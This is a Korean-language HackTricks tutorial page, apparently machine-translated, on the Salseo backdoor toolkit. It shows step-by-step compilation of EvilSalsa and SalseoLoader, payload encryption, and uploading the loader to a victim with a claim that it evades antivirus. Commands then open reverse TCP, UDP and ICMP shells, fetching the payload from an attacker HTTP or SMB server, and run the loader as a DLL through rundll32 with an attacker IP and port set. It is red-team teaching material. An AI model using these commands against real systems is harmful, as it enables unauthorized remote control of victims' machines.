# Salseo {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** ๐Ÿ’ฌ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** ๐Ÿฆ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} ## ๋ฐ”์ด๋„ˆ๋ฆฌ ์ปดํŒŒ์ผ github์—์„œ ์†Œ์Šค ์ฝ”๋“œ๋ฅผ ๋‹ค์šด๋กœ๋“œํ•˜๊ณ  **EvilSalsa**์™€ **SalseoLoader**๋ฅผ ์ปดํŒŒ์ผํ•ฉ๋‹ˆ๋‹ค. ์ฝ”๋“œ๋ฅผ ์ปดํŒŒ์ผํ•˜๋ ค๋ฉด **Visual Studio**๊ฐ€ ์„ค์น˜๋˜์–ด ์žˆ์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ์‚ฌ์šฉํ•  ์œˆ๋„์šฐ ๋ฐ•์Šค์˜ ์•„ํ‚คํ…์ฒ˜์— ๋งž๊ฒŒ ํ”„๋กœ์ ํŠธ๋ฅผ ์ปดํŒŒ์ผํ•ฉ๋‹ˆ๋‹ค(์œˆ๋„์šฐ๊ฐ€ x64๋ฅผ ์ง€์›ํ•˜๋ฉด ํ•ด๋‹น ์•„ํ‚คํ…์ฒ˜๋กœ ์ปดํŒŒ์ผํ•ฉ๋‹ˆ๋‹ค). **Visual Studio**์˜ **์™ผ์ชฝ "Build" ํƒญ**์—์„œ **"Platform Target"**์„ ํ†ตํ•ด **์•„ํ‚คํ…์ฒ˜๋ฅผ ์„ ํƒ**ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. (\*\*์ด ์˜ต์…˜์„ ์ฐพ์„ ์ˆ˜ ์—†์œผ๋ฉด **"Project Tab"**์„ ํด๋ฆญํ•œ ๋‹ค์Œ **"\ Properties"**๋ฅผ ํด๋ฆญํ•˜์„ธ์š”) ![](<../.gitbook/assets/image (839).png>) ๊ทธ๋Ÿฐ ๋‹ค์Œ ๋‘ ํ”„๋กœ์ ํŠธ๋ฅผ ๋นŒ๋“œํ•ฉ๋‹ˆ๋‹ค (Build -> Build Solution) (๋กœ๊ทธ ์•ˆ์— ์‹คํ–‰ ํŒŒ์ผ์˜ ๊ฒฝ๋กœ๊ฐ€ ๋‚˜ํƒ€๋‚ฉ๋‹ˆ๋‹ค): ![](<../.gitbook/assets/image (381).png>) ## ๋ฐฑ๋„์–ด ์ค€๋น„ ์šฐ์„ , **EvilSalsa.dll**์„ ์ธ์ฝ”๋”ฉํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ์ด๋ฅผ ์œ„ํ•ด **encrypterassembly.py**๋ผ๋Š” ํŒŒ์ด์ฌ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์‚ฌ์šฉํ•˜๊ฑฐ๋‚˜ **EncrypterAssembly** ํ”„๋กœ์ ํŠธ๋ฅผ ์ปดํŒŒ์ผํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ### **Python** ``` python EncrypterAssembly/encrypterassembly.py python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt ``` ### ์œˆ๋„์šฐ ``` EncrypterAssembly.exe EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt ``` ์•Œ๊ฒ ์Šต๋‹ˆ๋‹ค. ์ด์ œ ๋ชจ๋“  Salseo ์ž‘์—…์„ ์‹คํ–‰ํ•˜๋Š” ๋ฐ ํ•„์š”ํ•œ ๋ชจ๋“  ๊ฒƒ์ด ์žˆ์Šต๋‹ˆ๋‹ค: **์ธ์ฝ”๋”ฉ๋œ EvilDalsa.dll**๊ณผ **SalseoLoader์˜ ๋ฐ”์ด๋„ˆ๋ฆฌ.** **SalseoLoader.exe ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ๋จธ์‹ ์— ์—…๋กœ๋“œํ•˜์„ธ์š”. ์–ด๋–ค AV์—๋„ ํƒ์ง€๋˜์ง€ ์•Š์•„์•ผ ํ•ฉ๋‹ˆ๋‹ค...** ## **๋ฐฑ๋„์–ด ์‹คํ–‰** ### **TCP ๋ฆฌ๋ฒ„์Šค ์…ธ ์–ป๊ธฐ (HTTP๋ฅผ ํ†ตํ•ด ์ธ์ฝ”๋”ฉ๋œ dll ๋‹ค์šด๋กœ๋“œ)** nc๋ฅผ ๋ฆฌ๋ฒ„์Šค ์…ธ ๋ฆฌ์Šค๋„ˆ๋กœ ์‹œ์ž‘ํ•˜๊ณ  ์ธ์ฝ”๋”ฉ๋œ evilsalsa๋ฅผ ์ œ๊ณตํ•  HTTP ์„œ๋ฒ„๋ฅผ ์‹œ์ž‘ํ•˜๋Š” ๊ฒƒ์„ ์žŠ์ง€ ๋งˆ์„ธ์š”. ``` SalseoLoader.exe password http:///evilsalsa.dll.txt reversetcp ``` ### **UDP ๋ฆฌ๋ฒ„์Šค ์…ธ ์–ป๊ธฐ (SMB๋ฅผ ํ†ตํ•œ ์ธ์ฝ”๋”ฉ๋œ dll ๋‹ค์šด๋กœ๋“œ)** ๋ฆฌ๋ฒ„์Šค ์…ธ ๋ฆฌ์Šค๋„ˆ๋กœ nc๋ฅผ ์‹œ์ž‘ํ•˜๊ณ , ์ธ์ฝ”๋”ฉ๋œ evilsalsa๋ฅผ ์ œ๊ณตํ•˜๊ธฐ ์œ„ํ•ด SMB ์„œ๋ฒ„๋ฅผ ์‹œ์ž‘ํ•˜๋Š” ๊ฒƒ์„ ์žŠ์ง€ ๋งˆ์„ธ์š” (impacket-smbserver). ``` SalseoLoader.exe password \\/folder/evilsalsa.dll.txt reverseudp ``` ### **ICMP ๋ฆฌ๋ฒ„์Šค ์…ธ ์–ป๊ธฐ (ํ”ผํ•ด์ž ๋‚ด๋ถ€์— ์ด๋ฏธ ์ธ์ฝ”๋”ฉ๋œ dll)** **์ด๋ฒˆ์—๋Š” ๋ฆฌ๋ฒ„์Šค ์…ธ์„ ์ˆ˜์‹ ํ•˜๊ธฐ ์œ„ํ•ด ํด๋ผ์ด์–ธํŠธ์— ํŠน๋ณ„ํ•œ ๋„๊ตฌ๊ฐ€ ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค. ๋‹ค์šด๋กœ๋“œ:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh) #### **ICMP ์‘๋‹ต ๋น„ํ™œ์„ฑํ™”:** ``` sysctl -w net.ipv4.icmp_echo_ignore_all=1 #You finish, you can enable it again running: sysctl -w net.ipv4.icmp_echo_ignore_all=0 ``` #### ํด๋ผ์ด์–ธํŠธ ์‹คํ–‰: ``` python icmpsh_m.py "" "" ``` #### ํ”ผํ•ด์ž ๋‚ด๋ถ€์—์„œ, salseo ์ž‘์—…์„ ์‹คํ–‰ํ•ด ๋ณด๊ฒ ์Šต๋‹ˆ๋‹ค: ``` SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp ``` ## SalseoLoader๋ฅผ DLL๋กœ ์ปดํŒŒ์ผํ•˜์—ฌ ๋ฉ”์ธ ํ•จ์ˆ˜ ๋‚ด๋ณด๋‚ด๊ธฐ Visual Studio๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ SalseoLoader ํ”„๋กœ์ ํŠธ๋ฅผ ์—ฝ๋‹ˆ๋‹ค. ### ๋ฉ”์ธ ํ•จ์ˆ˜ ์•ž์— ์ถ”๊ฐ€: \[DllExport] ![](<../.gitbook/assets/image (409).png>) ### ์ด ํ”„๋กœ์ ํŠธ์— DllExport ์„ค์น˜ #### **๋„๊ตฌ** --> **NuGet ํŒจํ‚ค์ง€ ๊ด€๋ฆฌ์ž** --> **์†”๋ฃจ์…˜์šฉ NuGet ํŒจํ‚ค์ง€ ๊ด€๋ฆฌ...** ![](<../.gitbook/assets/image (881).png>) #### **DllExport ํŒจํ‚ค์ง€ ๊ฒ€์ƒ‰ (ํƒญ์—์„œ ์ฐพ์•„๋ณด๊ธฐ ์‚ฌ์šฉ), ์„ค์น˜๋ฅผ ๋ˆ„๋ฅด๊ณ  (ํŒ์—…์„ ์ˆ˜๋ฝ)** ![](<../.gitbook/assets/image (100).png>) ํ”„๋กœ์ ํŠธ ํด๋”์— **DllExport.bat** ๋ฐ **DllExport\_Configure.bat** ํŒŒ์ผ์ด ๋‚˜ํƒ€๋‚ฉ๋‹ˆ๋‹ค. ### **U**ninstall DllExport **Uninstall**์„ ๋ˆ„๋ฆ…๋‹ˆ๋‹ค (์ด์ƒํ•˜๊ฒŒ ๋“ค๋ฆฌ์ง€๋งŒ ๋ฏฟ์–ด์ฃผ์„ธ์š”, ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค) ![](<../.gitbook/assets/image (97).png>) ### **Visual Studio ์ข…๋ฃŒ ๋ฐ DllExport\_configure ์‹คํ–‰** ๊ทธ๋ƒฅ **์ข…๋ฃŒ**ํ•ฉ๋‹ˆ๋‹ค Visual Studio ๊ทธ๋Ÿฐ ๋‹ค์Œ, **SalseoLoader ํด๋”**๋กœ ๊ฐ€์„œ **DllExport\_Configure.bat**๋ฅผ ์‹คํ–‰ํ•ฉ๋‹ˆ๋‹ค. **x64**๋ฅผ ์„ ํƒํ•ฉ๋‹ˆ๋‹ค (x64 ๋ฐ•์Šค ๋‚ด์—์„œ ์‚ฌ์šฉํ•  ๊ฒฝ์šฐ, ์ œ ๊ฒฝ์šฐ๊ฐ€ ๊ทธ๋žฌ์Šต๋‹ˆ๋‹ค), **System.Runtime.InteropServices**๋ฅผ ์„ ํƒํ•ฉ๋‹ˆ๋‹ค ( **DllExport**์˜ **๋„ค์ž„์ŠคํŽ˜์ด์Šค** ๋‚ด์—์„œ) ๊ทธ๋ฆฌ๊ณ  **์ ์šฉ**์„ ๋ˆ„๋ฆ…๋‹ˆ๋‹ค. ![](<../.gitbook/assets/image (882).png>) ### **Visual Studio๋กœ ํ”„๋กœ์ ํŠธ ๋‹ค์‹œ ์—ด๊ธฐ** **\[DllExport]**๋Š” ๋” ์ด์ƒ ์˜ค๋ฅ˜๋กœ ํ‘œ์‹œ๋˜์ง€ ์•Š์•„์•ผ ํ•ฉ๋‹ˆ๋‹ค. ![](<../.gitbook/assets/image (670).png>) ### ์†”๋ฃจ์…˜ ๋นŒ๋“œ **์ถœ๋ ฅ ์œ ํ˜• = ํด๋ž˜์Šค ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ**๋ฅผ ์„ ํƒํ•ฉ๋‹ˆ๋‹ค (ํ”„๋กœ์ ํŠธ --> SalseoLoader ์†์„ฑ --> ์‘์šฉ ํ”„๋กœ๊ทธ๋žจ --> ์ถœ๋ ฅ ์œ ํ˜• = ํด๋ž˜์Šค ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ) ![](<../.gitbook/assets/image (847).png>) **x64** **ํ”Œ๋žซํผ**์„ ์„ ํƒํ•ฉ๋‹ˆ๋‹ค (ํ”„๋กœ์ ํŠธ --> SalseoLoader ์†์„ฑ --> ๋นŒ๋“œ --> ํ”Œ๋žซํผ ๋Œ€์ƒ = x64) ์†”๋ฃจ์…˜์„ **๋นŒ๋“œ**ํ•˜๋ ค๋ฉด: ๋นŒ๋“œ --> ์†”๋ฃจ์…˜ ๋นŒ๋“œ (์ถœ๋ ฅ ์ฝ˜์†” ๋‚ด์— ์ƒˆ DLL์˜ ๊ฒฝ๋กœ๊ฐ€ ๋‚˜ํƒ€๋‚ฉ๋‹ˆ๋‹ค) ### ์ƒ์„ฑ๋œ Dll ํ…Œ์ŠคํŠธ ํ…Œ์ŠคํŠธํ•  ์œ„์น˜์— Dll์„ ๋ณต์‚ฌํ•˜๊ณ  ๋ถ™์—ฌ๋„ฃ์Šต๋‹ˆ๋‹ค. ์‹คํ–‰: ``` rundll32.exe SalseoLoader.dll,main ``` ์˜ค๋ฅ˜๊ฐ€ ๋‚˜ํƒ€๋‚˜์ง€ ์•Š์œผ๋ฉด, ์•„๋งˆ๋„ ๊ธฐ๋Šฅํ•˜๋Š” DLL์ด ์žˆ๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค!! ## DLL์„ ์‚ฌ์šฉํ•˜์—ฌ ์…ธ ์–ป๊ธฐ **HTTP** **์„œ๋ฒ„**๋ฅผ ์‚ฌ์šฉํ•˜๊ณ  **nc** **๋ฆฌ์Šค๋„ˆ**๋ฅผ ์„ค์ •ํ•˜๋Š” ๊ฒƒ์„ ์žŠ์ง€ ๋งˆ์„ธ์š”. ### Powershell ``` $env:pass="password" $env:payload="http://10.2.0.5/evilsalsax64.dll.txt" $env:lhost="10.2.0.5" $env:lport="1337" $env:shell="reversetcp" rundll32.exe SalseoLoader.dll,main ``` ### CMD ``` set pass=password set payload=http://10.2.0.5/evilsalsax64.dll.txt set lhost=10.2.0.5 set lport=1337 set shell=reversetcp rundll32.exe SalseoLoader.dll,main ``` {% hint style="success" %} AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
HackTricks ์ง€์›ํ•˜๊ธฐ * [**๊ตฌ๋… ๊ณ„ํš**](https://github.com/sponsors/carlospolop) ํ™•์ธํ•˜๊ธฐ! * **๐Ÿ’ฌ [**๋””์Šค์ฝ”๋“œ ๊ทธ๋ฃน**](https://discord.gg/hRep4RUj7f) ๋˜๋Š” [**ํ…”๋ ˆ๊ทธ๋žจ ๊ทธ๋ฃน**](https://t.me/peass)์— ์ฐธ์—ฌํ•˜๊ฑฐ๋‚˜ **ํŠธ์œ„ํ„ฐ** ๐Ÿฆ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**๋ฅผ ํŒ”๋กœ์šฐํ•˜์„ธ์š”.** * **[**HackTricks**](https://github.com/carlospolop/hacktricks) ๋ฐ [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) ๊นƒํ—ˆ๋ธŒ ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์— PR์„ ์ œ์ถœํ•˜์—ฌ ํ•ดํ‚น ํŠธ๋ฆญ์„ ๊ณต์œ ํ•˜์„ธ์š”.**
{% endhint %}